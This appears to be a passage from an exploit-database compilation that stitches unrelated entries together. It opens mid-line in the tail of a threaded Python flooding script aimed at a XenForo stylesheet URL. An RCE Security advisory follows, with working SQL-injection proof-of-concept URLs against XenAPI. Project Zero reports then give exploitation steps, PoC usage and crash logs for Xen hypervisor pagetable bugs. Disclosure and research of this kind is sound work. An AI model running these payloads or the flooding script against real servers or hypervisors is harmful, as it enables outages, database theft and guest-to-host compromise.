ogin_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code&style=100&dir=LTR&d=1520450366'
for i in range(args.t):
t = SendGETThread()
t.start()
if args.p:
url = args.p
for i in range(args.t):
t = SendPOSTThread()
t.start()
if len(sys.argv)==1:
parser.print_help()
exit()
if __name__ == "__main__":
main(sys.argv[1:])
[RCESEC-2016-002] XenAPI v1.4.1 for XenForo Multiple Unauthenticated SQL Injections
RCE Security Advisory
https://www.rcesecurity.com
1. ADVISORY INFORMATION
=======================
Product: XenAPI for XenForo
Vendor URL: github.com/Contex/XenAPI
Type: SQL Injection [CWE-89]
Date found: 2016-05-20
Date published: 2016-05-23
CVSSv3 Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
CVE: -
2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.
3. VERSIONS AFFECTED
====================
XenAPI for XenForo v1.4.1
older versions may be affected too but were not tested.
4. INTRODUCTION
===============
This Open Source REST API allows usage of several of XenForo's functions,
such as authentication, user information and many other functions!
(from the vendor's homepage)
5. VULNERABILITY DETAILS
========================
The plugin "XenAPI" for XenForo offers a REST Api with different functions
to query and edit information from the XenForo database backend. Amongst
those are "getGroup" and "getUsers", which can be called without
authentication (default) and since the application does not properly
validate and sanitize the "value" parameter, it is possible to inject
arbitrary SQL commands into the XenForo backend database.
The following proof-of-concepts exploit each vulnerable REST action
and extract the hostname of the server:
https://127.0.0.1/api.php?action=getUsers&value=' UNION ALL SELECT
CONCAT(IFNULL(CAST(%40%40HOSTNAME AS CHAR)%2C0x20))%2CNULL%23
https://127.0.0.1/api.php?action=getGroup&value=' UNION ALL SELECT
NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT(IFNULL(CAST(%40%40HOSTNAME AS
CHAR)%2C0x20))%2CNULL%23
6. RISK
=======
The vulnerability allows remote attackers to read sensitive information
from the XenForo database like usernames and passwords. Since the affected
REST actions do not require an authentication hash, these vulnerabilities
can be exploited by an unauthenticated attacker.
7. SOLUTION
===========
Update to the latest version v1.4.2
8. REPORT TIMELINE
==================
2016-05-20: Discovery of the vulnerability
2016-05-20: Notified vendor via contact address
2016-05-20: Vendor provides update for both issues
2016-05-21: Provided update fixes the reported issues
2016-05-21: Vendor publishes update
2016-05-23: Advisory released
9. REFERENCES
=============
https://github.com/Contex/XenAPI/commit/00a737a1fe45ffe5c5bc6bace44631ddb73f2ecf
https://xenforo.com/community/resources/xenapi-xenforo-php-rest-api.902/update?update=19336
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231
This is a bug in Xen that permits an attacker with control over the
kernel of a 64bit X86 PV guest to write arbitrary entries into a live
top-level pagetable.
To prevent PV guests from doing things like mapping live pagetables as
writable, Xen assigns types to physical pages and tracks type-specific
references with a reference counter ("type count", stored in the low
bits of page->u.inuse.type_info).
64-bit PV guests have multiple places in which the addresses of
top-level pagetables are stored:
arch.guest_table_user and arch.guest_table in the vcpu struct point to
the pagetables the guest has designated as user-mode top-level
pagetable and kernel-mode top-level pagetable. Both of these fields
take a type-specific reference on the pagetable to prevent the guest
from mapping it as writable.
arch.cr3 in the vcpu struct points to the current top-level pagetable
of the vCPU. While the vCPU is scheduled, arch.cr3 is the same as the
physical CPU's CR3.
arch.cr3 does not take an extra type-specific reference; it borrows
the reference from either arch.guest_table_user or arch.guest_table.
This means that whenever the field from which the reference is
borrowed is updated, arch.cr3 (together with the physical CR3) must be
updated as well.
The guest can update arch.guest_table_user and arch.guest_table using
__HYPERVISOR_mmuext_op with commands
MMUEXT_NEW_USER_BASEPTR (for arch.guest_table_user) and
MMUEXT_NEW_BASEPTR (for arch.guest_table). The handlers for these
commands assume that when the hypercall is executed, arch.cr3 always
equals arch.guest_table: The MMUEXT_NEW_BASEPTR handler updates
arch.cr3 to the new arch.guest_table, the MMUEXT_NEW_USER_BASEPTR
handler doesn't touch arch.cr3.
Hypercalls can only be executed from kernel context, so on hypercall
entry, arch.cr3==arch.guest_table is indeed true. However, using the
__HYPERVISOR_multicall hypercall, it is possible to execute the
__HYPERVISOR_iret hypercall, which can switch the pagetables to user
context, immediately followed by the __HYPERVISOR_mmuext_op hypercall
before actually entering guest user context.
This can be exploited from guest kernel context roughly as follows:
- copy all entries from the top-level kernel pagetable over the
top-level user pagetable (to make it possible for a post-iret
hypercall to access guest kernel memory)
- allocate a new page to be used later as top-level user pagetable,
copy the contents of the current top-level user pagetable into it,
remap it as readonly and pin it as a top-level pagetable
- perform the following operations in a single multicall:
- switch to user context using __HYPERVISOR_iret
- change arch.guest_table_user to the new top-level user pagetable
using __HYPERVISOR_mmuext_op with command MMUEXT_NEW_USER_BASEPTR
- unpin the old top-level user pagetable
- map the old top-level user pagetable as writable
- write crafted entries into the old top-level user pagetable
I have attached a proof of concept that corrupts the top-level
pagetable entry that maps the hypervisor text, causing a host
triplefault. I have tested the proof of concept in the following
configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.2 installed
Xen version 4.6.4
Compile the PoC with ./compile.sh, then run ./attack as root.
PoC Filename: xen_ptuaf.tar
################################################################################
Here's an exploit that causes the hypervisor to execute shellcode that then deliberately causes a hypervisor GPF by calling a noncanonical address. Usage:
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/xen_ptuaf_hv_shellcode_exec/built-in.o
CC [M] /root/xen_ptuaf_hv_shellcode_exec/module.o
nasm -f elf64 -o /root/xen_ptuaf_hv_shellcode_exec/native.o /root/xen_ptuaf_hv_shellcode_exec/native.asm
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/xen_ptuaf_hv_shellcode_exec/.native.o.cmd for /root/xen_ptuaf_hv_shellcode_exec/native.o
CC /root/xen_ptuaf_hv_shellcode_exec/test.mod.o
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./attack
kernel CR3: 0xaa2dd000
L1 self-mapping is up, should have reliable pagetable control now
virt_to_pte(0x7f5bd439a000)
[ rest of output missing because of VM crash ]
Serial output:
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 2
(XEN) RIP: e008:[<00007f5bd439a03f>] 00007f5bd439a03f
(XEN) RFLAGS: 0000000000010246 CONTEXT: hypervisor (d1v2)
(XEN) rax: 1337133713371337 rbx: 1337133713371337 rcx: 1337133713371337
(XEN) rdx: 1337133713371337 rsi: 00007ffe98b5e248 rdi: 0000600000003850
(XEN) rbp: 1337133713371337 rsp: ffff8301abb37f30 r8: 0000000000000000
(XEN) r9: 000000000000001b r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 0000000080000000 r13: ffff8800026dd000 r14: ffff880003453c88
(XEN) r15: 0000000000000007 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 00000000aa2dc000 cr2: ffff88007cfb2e98
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: 0000 cs: e008
(XEN) Xen stack trace from rsp=ffff8301abb37f30:
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 0000000000401556 000000000000e033 0000000000000246
(XEN) 00007ffe98b5e208 000000000000e02b 0000000000000000 0000000000000000
(XEN) 0000000000000000 0000000000000000 0000000000000002 ffff830088c9c000
(XEN) 000000312b835580 0000000000000000
(XEN) Xen call trace:
(XEN) [<00007f5bd439a03f>] 00007f5bd439a03f
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 2:
(XEN) GENERAL PROTECTION FAULT
(XEN) [error_code=0000]
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
PoC Filename: xen_ptuaf_hv_shellcode_exec.tar
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41973.zip
Xen allows pagetables of the same level to map each other as readonly
in PV domains. This is useful if a guest wants to use the
self-referential pagetable trick for easy access to pagetables
by mapped virtual address.
When cleaning up a pagetable after the last typed reference to it has been
dropped (via __put_page_type() -> __put_final_page_type() -> free_page_type()),
Xen will recursively drop the typed refcounts of pages referenced by the pagetable,
potentially recursively cleaning them up as well.
For normal pagetables, the recursion depth is bounded by the number of paging levels
the architecture supports. However, no such depth limit exists for pagetables of the
same depth that map each other.
The attached PoC will set up a chain of 1000 L4 pagetables such that
the first pagetable is type-pinned and each following pagetable is referenced by the
previous one. Then, the type-pin of the first pagetable is removed, and the following
999 pagetables are recursively cleaned up, causing a stack overflow.
To run the PoC in a PV domain, install kernel headers, then run ./compile, then load the built module via insmod.
Xen console output caused by running the PoC inside a normal PV domain:
==============================
(XEN) Xen version 4.8.1 (Debian 4.8.1-1+deb9u3) (ian.jackson@eu.citrix.com) (gcc (Debian 6.3.0-18) 6.3.0 20170516) debug=n Thu Sep 7 18:24:26 UTC 2017
(XEN) Bootloader: GRUB 2.02~beta3-5
(XEN) Command line: loglvl=all com1=115200,8n1,pci console=com1 placeholder
(XEN) Video information:
(XEN) VGA is text mode 80x25, font 8x16
(XEN) Disc information:
(XEN) Found 1 MBR signatures
(XEN) Found 1 EDD information structures
(XEN) Xen-e820 RAM map:
(XEN) 0000000000000000 - 000000000009fc00 (usable)
(XEN) 000000000009fc00 - 00000000000a0000 (reserved)
(XEN) 00000000000f0000 - 0000000000100000 (reserved)
(XEN) 0000000000100000 - 00000000dfff0000 (usable)
(XEN) 00000000dfff0000 - 00000000e0000000 (ACPI data)
(XEN) 00000000fec00000 - 00000000fec01000 (reserved)
(XEN) 00000000fee00000 - 00000000fee01000 (reserved)
(XEN) 00000000fffc0000 - 0000000100000000 (reserved)
(XEN) 0000000100000000 - 0000000120000000 (usable)
(XEN) ACPI: RSDP 000E0000, 0024 (r2 VBOX )
(XEN) ACPI: XSDT DFFF0030, 003C (r1 VBOX VBOXXSDT 1 ASL 61)
(XEN) ACPI: FACP DFFF00F0, 00F4 (r4 VBOX VBOXFACP 1 ASL 61)
(XEN) ACPI: DSDT DFFF0470, 210F (r1 VBOX VBOXBIOS 2 INTL 20140214)
(XEN) ACPI: FACS DFFF0200, 0040
(XEN) ACPI: APIC DFFF0240, 0054 (r2 VBOX VBOXAPIC 1 ASL 61)
(XEN) ACPI: SSDT DFFF02A0, 01CC (r1 VBOX VBOXCPUT 2 INTL 20140214)
(XEN) System RAM: 4095MB (4193852kB)
(XEN) No NUMA configuration found
(XEN) Faking a node at 0000000000000000-0000000120000000
(XEN) Domain heap initialised
(XEN) CPU Vendor: Intel, Family 6 (0x6), Model 78 (0x4e), Stepping 3 (raw 000406e3)
(XEN) found SMP MP-table at 0009fff0
(XEN) DMI 2.5 present.
(XEN) Using APIC driver default
(XEN) ACPI: PM-Timer IO Port: 0x4008 (32 bits)
(XEN) ACPI: SLEEP INFO: pm1x_cnt[1:4004,1:0], pm1x_evt[1:4000,1:0]
(XEN) ACPI: wakeup_vec[dfff020c], vec_size[20]
(XEN) ACPI: Local APIC address 0xfee00000
(XEN) ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
(XEN) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
(XEN) IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
(XEN) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
